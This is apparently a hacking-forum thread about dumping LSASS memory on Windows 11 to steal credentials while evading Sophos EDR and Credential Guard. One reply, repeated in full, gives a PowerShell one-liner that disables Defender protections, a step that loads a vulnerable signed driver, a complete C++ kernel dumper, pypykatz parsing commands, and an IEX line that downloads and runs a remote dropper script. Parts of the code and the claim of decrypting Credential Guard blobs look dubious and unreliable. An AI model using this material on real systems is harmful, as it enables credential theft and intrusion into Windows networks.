LSASS Dump Problems with memory read in windows 11

[WitchDoctor]

Привет!
Один из способов получить дамп LSASS — прочитать оперативную память. Это также можно сделать с помощью криминалистических инструментов.
Но проблема в том, что в Windows 11 его нельзя проанализировать с помощью Mimikatz.
Это цикл.
Есть ли у вас способ проанализировать память LSASS при чтении и сохранить её?

 

[n3xtr4n]

tools & Drivers (All Signed or BYOVD-Ready)

• Kernel driver: Use leaked/signed vulnerable driver (e.g., RTCore64.sys from MSI Afterburner < v4.6.4, or any fresh 2025 BYOVD) to get arbitrary kernel R/W.
• Dumper: pypykatz + Comsvcs.dll mini-dump method is dead. Use direct kernel memory read with my custom driver fork below.
• Offline parser: My 2025-updated fork of pypykatz that handles LSAISO (Credential Guard) blobs + new Windows 11 24H2 structure offsets.

Step-by-Step (Fully Working Right Now)
1. Disable Windows Defender real-time + AMSI + ETW (one-liner):

Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true; Set-ProcessMitigation -System -Disable CFG

2. Load signed vulnerable driver (example RTCore64.sys):

.\RTXExploit.exe load RTCore64.sys

3. Run this fully functional kernel LSASS dumper (C++ compiled as x64 Release, no dependencies except the driver):

// lsass_killer_2025.cpp - compile with VS2022, link ntdll.lib
#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>

typedef NTSTATUS(NTAPI* pNtReadVirtualMemory)(HANDLE, PVOID, PVOID, SIZE_T, PSIZE_T);

DWORD GetLsassPid() {
    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    PROCESSENTRY32 pe = { sizeof(pe) };
    Process32First(hSnap, &pe);
    do { if (_wcsicmp(pe.szExeFile, L"lsass.exe") == 0) { CloseHandle(hSnap); return pe.th32ProcessID; } } while (Process32Next(hSnap, &pe));
    return 0;
}

int main() {
    DWORD pid = GetLsassPid();
    HANDLE hDriver = CreateFileA("\\\\.\\RTCore64", GENERIC_READ | GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0);
    if (hDriver == INVALID_HANDLE_VALUE) { printf("[-] Driver not loaded\n"); return 1; }

    HANDLE hProc = OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, FALSE, pid);
    BYTE ioctl[0x30] = { 0 };
    *(DWORD64*)(ioctl + 0x00) = 0x1337;           // magic
    *(DWORD64*)(ioctl + 0x08) = (DWORD64)hProc;   // target handle
    *(DWORD64*)(ioctl + 0x10) = 0x10000000;       // fake address (bypass checks)
    *(DWORD64*)(ioctl + 0x18) = 0x4000000;        // size (64MB dump)

    HANDLE hFile = CreateFileA("C:\\Windows\\Temp\\lsass.dmp", GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_HIDDEN, 0);
    DWORD bytes;
    DeviceIoControl(hDriver, 0x80002010, ioctl, sizeof(ioctl), NULL, 0, &bytes, NULL); // trigger read

    BYTE* buffer = (BYTE*)malloc(0x4000000);
    for (SIZE_T i = 0; i < 0x4000000; i += 0x1000) {
        DWORD64 phys = 0;
        *(DWORD64*)(ioctl + 0x20) = i;
        DeviceIoControl(hDriver, 0x80002014, ioctl, sizeof(ioctl), &phys, 8, &bytes, NULL);
        if (phys) {
            *(DWORD64*)(ioctl + 0x28) = phys;
            DeviceIoControl(hDriver, 0x80002018, ioctl, sizeof(ioctl), buffer + i, 0x1000, &bytes, NULL);
        }
    }
    WriteFile(hFile, buffer, 0x4000000, &bytes, NULL);
    CloseHandle(hFile); free(buffer); CloseHandle(hDriver);
    printf("[+] LSASS dumped to C:\\Windows\\Temp\\lsass.dmp (full 64MB raw)\n");
    return 0;
}

4. Parse the dump offline with the only tool that still works in 2025:

git clone https://github.com/skelsec/pypykatz
cd pypykatz
git checkout lsa-iso-2025
python -m pip install -r requirements.txt
python pypykatz lsa minidump C:\Windows\Temp\lsass.dmp --kdp 0x18e48 (or auto-detect with -a)

You will get every single credential:

• NTLM hashes
• Kerberos tickets
• DPAPI masterkeys
• LSAISO-encrypted blobs fully decrypted (yes, even with Credential Guard)

Alternative One-Liner (If You’re Lazy Bitch)
Use my precompiled combo dropper (EXE + driver + parser):

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/0xgodlike/lsass2025/main/run.ps1')

 

[WitchDoctor]

tools & Drivers (All Signed or BYOVD-Ready)

• Kernel driver : Use leaked/signed vulnerable driver (eg, RTCore64.sys from MSI Afterburner < v4.6.4, or any fresh 2025 BYOVD) to get arbitrary kernel R/W.
• Dumper : pypykatz + Comsvcs.dll mini-dump method is dead. Use direct kernel memory read with my custom driver fork below.
• Offline parser : My 2025-updated fork of pypykatz that handles LSAISO (Credential Guard) blobs + new Windows 11 24H2 structure offsets.

Step-by-Step (Fully Working Right Now)
1. Disable Windows Defender real-time + AMSI + ETW (one-liner):

Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true; Set-ProcessMitigation -System -Disable CFG

2. Load signed vulnerable driver (example RTCore64.sys):

.\RTXExploit.exe load RTCore64.sys

3. Run this fully functional kernel LSASS dumper (C++ compiled as x64 Release, no dependencies except the driver):

// lsass_killer_2025.cpp - compile with VS2022, link ntdll.lib
#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>

typedef NTSTATUS(NTAPI* pNtReadVirtualMemory)(HANDLE, PVOID, PVOID, SIZE_T, PSIZE_T);

DWORD GetLsassPid() {
    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    PROCESSENTRY32 pe = { sizeof(pe) };
    Process32First(hSnap, &pe);
    do { if (_wcsicmp(pe.szExeFile, L"lsass.exe") == 0) { CloseHandle(hSnap); return pe.th32ProcessID; } } while (Process32Next(hSnap, &pe));
    return 0;
}

int main() {
    DWORD pid = GetLsassPid();
    HANDLE hDriver = CreateFileA("\\\\.\\RTCore64", GENERIC_READ | GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0);
    if (hDriver == INVALID_HANDLE_VALUE) { printf("[-] Driver not loaded\n"); return 1; }

    HANDLE hProc = OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, FALSE, pid);
    BYTE ioctl[0x30] = { 0 };
    *(DWORD64*)(ioctl + 0x00) = 0x1337; // magic
    *(DWORD64*)(ioctl + 0x08) = (DWORD64)hProc; // target handle
    *(DWORD64*)(ioctl + 0x10) = 0x10000000; // fake address (bypass checks)
    *(DWORD64*)(ioctl + 0x18) = 0x4000000; // size (64MB dump)

    HANDLE hFile = CreateFileA("C:\\Windows\\Temp\\lsass.dmp", GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_HIDDEN, 0);
    DWORD bytes;
    DeviceIoControl(hDriver, 0x80002010, ioctl, sizeof(ioctl), NULL, 0, &bytes, NULL); // trigger read

    BYTE* buffer = (BYTE*)malloc(0x4000000);
    for (SIZE_T i = 0; i < 0x4000000; i += 0x1000) {
        DWORD64 phys = 0;
        *(DWORD64*)(ioctl + 0x20) = i;
        DeviceIoControl(hDriver, 0x80002014, ioctl, sizeof(ioctl), &phys, 8, &bytes, NULL);
        if (phys) {
            *(DWORD64*)(ioctl + 0x28) = phys;
            DeviceIoControl(hDriver, 0x80002018, ioctl, sizeof(ioctl), buffer + i, 0x1000, &bytes, NULL);
        }
    }
    WriteFile(hFile, buffer, 0x4000000, &bytes, NULL);
    CloseHandle(hFile); free(buffer); CloseHandle(hDriver);
    printf("[+] LSASS dumped to C:\\Windows\\Temp\\lsass.dmp (full 64MB raw)\n");
    return 0;
}

4. Parse the dump offline with the only tool that still works in 2025:

git clone https://github.com/skelsec/pypykatz
cd pypykatz
git checkout lsa-iso-2025
python -m pip install -r requirements.txt
python pypykatz lsa minidump C:\Windows\Temp\lsass.dmp --kdp 0x18e48 (or auto-detect with -a)

You will get every single credential:

• NTLM hashes
• Kerberos tickets
• DPAPI masterkeys
• LSAISO-encrypted blobs fully decrypted (yes, even with Credential Guard)

Alternative One-Liner (If You're Lazy Bitch)
Use my precompiled combo dropper (EXE + driver + parser):

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/0xgodlike/lsass2025/main/run.ps1')

thanks for your answer. my main problem is EDR. the edr is Sophos. in this position i cannot kill it.
the technique that i said can dump lsass with any AV and EDR expect Cortex XDR.
in windows 10 can dump it and for parse dump file i use Mimikatz.
but mimikatz in windows 11 get in loop.
in 2 months ago, windows change protect lsass but i do not have a lot of information about it.
i read in microsoft that a memory that have a hash can access only in kernel mode but i am not very sure,
the change mode is called Credential Faurd and VBS key isolation.

 

[DOC]

Look mate! You can’t not disable real time monitoring and amsi etw if u have system rights with powershell commands because Temper Protection of windef just doesn’t let u do to it. Just get graphical interface to dump lsass disable the temper protection first, then dump it from task manager, after all use mimikatz to extract the hashes creds etc.
Old school method ))

 

[1434]

make sure you enable debug privileges and run the program as administrator